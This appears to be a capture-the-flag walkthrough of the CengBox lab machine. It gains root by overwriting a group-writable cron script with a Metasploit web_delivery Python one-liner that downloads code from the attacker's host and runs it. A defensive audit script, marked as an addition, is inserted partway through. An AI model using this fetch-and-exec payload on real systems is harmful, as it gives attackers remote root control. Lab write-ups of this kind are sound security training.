HackingLab – CEng Company

Inside the /home/cengover directory we find the file user.txt, which contains another flag: 8f7f6471e2e869f029a75c5de601d5e0

cengover@cengbox:/home$ cd cengover
cd cengover
cengover@cengbox:~$ ls -al
ls -al
total 116
drwx------ 4 cengover cengover 4096 Apr 29 18:50 .
drwxr-xr-x 4 root     root     4096 Apr 25 23:01 ..
-rw------- 1 cengover cengover    0 Apr 29 18:50 .bash_history
-rw-r--r-- 1 cengover cengover  220 Apr 25 23:01 .bash_logout
-rw-r--r-- 1 cengover cengover 3771 Apr 25 23:01 .bashrc
drwx------ 2 cengover cengover 4096 Apr 25 23:08 .cache
lrwxrwxrwx 1 cengover cengover   34 Apr 25 23:01 .ecryptfs -> /home/.ecryptfs/cengover/.ecryptfs
-rw------- 1 cengover cengover  478 Apr 27 19:01 .mysql_history
drwxrwxr-x 2 cengover cengover 4096 Apr 26 21:31 .nano
lrwxrwxrwx 1 cengover cengover   33 Apr 25 23:01 .Private -> /home/.ecryptfs/cengover/.Private
-rw-r--r-- 1 cengover cengover  655 Apr 25 23:01 .profile
-rw-r--r-- 1 cengover cengover    0 Apr 25 23:10 .sudo_as_admin_successful
-rw-rw-r-- 1 cengover cengover   33 Apr 29 18:43 user.txt
-rw------- 1 cengover cengover 7148 Apr 29 16:12 .viminfo
cengover@cengbox:~$ cat user.txt
cat user.txt
8f7f6471e2e869f029a75c5de601d5e0

With wget we download pspy64, a tool that shows the processes being executed, to check whether any process runs with root privileges that we could use for privilege escalation.

cengover@cengbox:~$ cd /tmp
cd /tmp
cengover@cengbox:/tmp$ wget https://github.com/DominicBreuker/pspy/releases/download/v1.2.0/pspy64
--2020-06-06 16:14:09--  https://github.com/DominicBreuker/pspy/releases/download/v1.2.0/pspy64
Resolving github.com (github.com)... 140.82.118.4
Connecting to github.com (github.com)|140.82.118.4|:443... connected.
HTTP request sent, awaiting response... 302 Found
HTTP request sent, awaiting response... 200 OK
Length: 3078592 (2.9M) [application/octet-stream]
Saving to: ‘pspy64’

pspy64              100%[===================>]   2.94M  2.87MB/s    in 1.0s    

2020-06-06 16:14:11 (2.87 MB/s) - ‘pspy64’ saved [3078592/3078592]

We run pspy64 after changing its permissions to make it executable, and we observe a process /bin/sh -c /usr/bin/python3 /opt/md5check.py being executed with root privileges; we check the access permissions with file <FILE NAME>: the file is writable by our user (it is owned by root:users with mode rw-rw----, so the users group has write access).

cengover@cengbox:/$ cd /opt
cd /opt
cengover@cengbox:/opt$ ls -al
ls -al
total 12
drwxr-xr-x  2 root root  4096 Apr 28 13:35 .
drwxr-xr-x 23 root root  4096 Jun  6 09:06 ..
-rw-rw----  1 root users  545 Apr 29 16:12 md5check.py
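As a defensive counterpart to the finding above, here is an added audit example (not part of the original walkthrough): it parses a pspy/cron command line and the `ls -l` entry of the script it runs, and flags a root-run script that non-root users can modify. The sample inputs are constructed from the values shown on this page; the hardened listing is an assumed comparison.

```python
import re
import stat

# Constructed sample inputs (values taken from this walkthrough): the root-run
# command pspy reported, and the `ls -l` entry of the script it executes.
SAMPLE_COMMAND = "/bin/sh -c /usr/bin/python3 /opt/md5check.py"
SAMPLE_LS = "-rw-rw----  1 root users  545 Apr 29 16:12 md5check.py"
HARDENED_LS = "-rw-r--r--  1 root root   545 Apr 29 16:12 md5check.py"  # assumed fix

# `ls -l` line: type, 9 permission chars, links, owner, group, size, 3 date tokens, name.
LS_RE = re.compile(
    r"^([-dlcbps])([rwxsStT-]{9})\s+\d+\s+(\S+)\s+(\S+)\s+\d+\s+\S+\s+\S+\s+\S+\s+(.+)$"
)

def parse_ls_entry(line):
    """Return (file_type, mode_bits, owner, group, name) for one `ls -l` line."""
    m = LS_RE.match(line.strip())
    if not m:
        raise ValueError(f"unrecognised ls -l line: {line!r}")
    ftype, perms, owner, group, name = m.groups()
    bits = 0
    for i, ch in enumerate(perms):
        if ch not in "-ST":  # 'S'/'T' mean setuid/setgid/sticky without exec
            bits |= 1 << (8 - i)
    return ftype, bits, owner, group, name

def script_from_command(cmd):
    """Pick the absolute script path out of a cron/pspy command line, if any."""
    for tok in cmd.split():
        if tok.startswith("/") and tok.endswith((".py", ".sh", ".pl")):
            return tok
    return None

def writable_by_non_root(bits, owner, group):
    """True if a non-root principal can modify the file (owner, group or world)."""
    if owner != "root" and bits & stat.S_IWUSR:
        return True
    if group != "root" and bits & stat.S_IWGRP:
        return True
    return bool(bits & stat.S_IWOTH)

def audit_root_job(cmd, ls_line):
    """Flag a root-run script whose ls -l entry lets non-root users rewrite it."""
    path = script_from_command(cmd)
    _, bits, owner, group, name = parse_ls_entry(ls_line)
    if path is None or path.rsplit("/", 1)[-1] != name:
        return None  # the listing does not describe the executed script
    return {"path": path, "owner": owner, "group": group,
            "writable_by_non_root": writable_by_non_root(bits, owner, group)}
```

Run `audit_root_job(SAMPLE_COMMAND, SAMPLE_LS)` to see the /opt/md5check.py case flagged, and the same call with `HARDENED_LS` to see the root:root 644 version pass.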

One way to obtain a root shell is to insert a payload into the md5check script so that it is executed by crontab; the payload chosen is web_delivery, which we find in metasploit. We therefore search for it and select the payload with the command use <PAYLOAD NAME>.

msf5 > search web_delivery

Matching Modules
================

   #  Name                                                        Disclosure Date  Rank       Check  Description
   -  ----                                                        ---------------  ----       -----  -----------
   0  exploit/multi/postgres/postgres_copy_from_program_cmd_exec  2019-03-20       excellent  Yes    PostgreSQL COPY FROM PROGRAM Command Execution
   1  exploit/multi/script/web_delivery                           2013-07-19       manual     No     Script Web Delivery


msf5 > use exploit/multi/script/web_delivery
msf5 exploit(multi/script/web_delivery) > show options

Module options (exploit/multi/script/web_delivery):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)


Payload options (python/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Python

We set the LHOST and LPORT variables to the IP address of our attacking machine and to the port we decide to listen on.
We then generate the payload with the exploit command.

msf5 exploit(multi/script/web_delivery) > set lhost 192.168.188.75
lhost => 192.168.188.75
msf5 exploit(multi/script/web_delivery) > set lport 4456
lport => 4456
msf5 exploit(multi/script/web_delivery) > exploit
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 192.168.188.75:4456 
msf5 exploit(multi/script/web_delivery) > [*] Using URL: http://0.0.0.0:8080/2FOXNncvyd
[*] Local IP: http://192.168.188.75:8080/2FOXNncvyd
[*] Server started.
[*] Run the following command on the target machine:
python -c "import sys;import ssl;u=__import__('urllib'+{2:'',3:'.request'}[sys.version_info[0]],fromlist=('urlopen',));r=u.urlopen('http://192.168.188.75:8080/2FOXNncvyd', context=ssl._create_unverified_context());exec(r.read());"

With the echo command we insert the payload into the md5check.py script, taking care NOT to include the python -c part of the command.

cengover@cengbox:/opt$ echo "import sys;import ssl;u=__import__('urllib'+{2:'',3:'.request'}[sys.version_info[0]],fromlist=('urlopen',));r=u.urlopen('http://192.168.188.75:8080/2FOXNncvyd', context=ssl._create_unverified_context());exec(r.read());" > md5check.py                                                                                                    
cengover@cengbox:/opt$ cat md5check.py                                                                                      
cat md5check.py
import sys;import ssl;u=__import__('urllib'+{2:'',3:'.request'}[sys.version_info[0]],fromlist=('urlopen',));r=u.urlopen('http://192.168.188.75:8080/2FOXNncvyd', context=ssl._create_unverified_context());exec(r.read());

After a few minutes the script is executed and we obtain access as root.

[*] 192.168.188.81   web_delivery - Delivering Payload (437 bytes)
[*] Sending stage (53755 bytes) to 192.168.188.81
[*] Meterpreter session 1 opened (192.168.188.53:6789 -> 192.168.188.81:51770) at 2020-06-07 12:18:57 -0400
msf5 exploit(multi/script/web_delivery) > sessions 1
[*] Starting interaction with 5...

meterpreter > cd /root
meterpreter > ls -al
Listing: /root
==============

Mode              Size   Type  Last modified              Name
----              ----   ----  -------------              ----
100600/rw-------  5      fil   2020-04-29 11:50:28 -0400  .bash_history
100644/rw-r--r--  3106   fil   2020-04-25 15:51:03 -0400  .bashrc
40755/rwxr-xr-x   4096   dir   2020-04-26 06:30:38 -0400  .nano
100644/rw-r--r--  148    fil   2020-04-25 15:51:03 -0400  .profile
100644/rw-r--r--  66     fil   2020-04-28 06:48:09 -0400  .selected_editor
100600/rw-------  5362   fil   2020-04-29 11:50:19 -0400  .viminfo
100644/rw-r--r--  48861  fil   2020-06-07 00:24:01 -0400  note.txt
100644/rw-r--r--  420    fil   2020-04-29 11:50:19 -0400  root.txt

meterpreter > 

Having obtained the shell, we move into the root directory and view its contents.

meterpreter > cat root.txt
 / ____|  ____|           |  _ \           
| |    | |__   _ __   __ _| |_) | _____  __
| |    |  __| | '_ \ / _` |  _ < / _ \ \/ /
| |____| |____| | | | (_| | |_) | (_) >  < 
 \_____|______|_| |_|\__, |____/ \___/_/\_\
                      __/ |                
                     |___/                 

Congrats. Hope you enjoyed it and you can contact me on Twitter @arslanblcn_

a51e522b22a439b8e1b22d84f71cf0f2
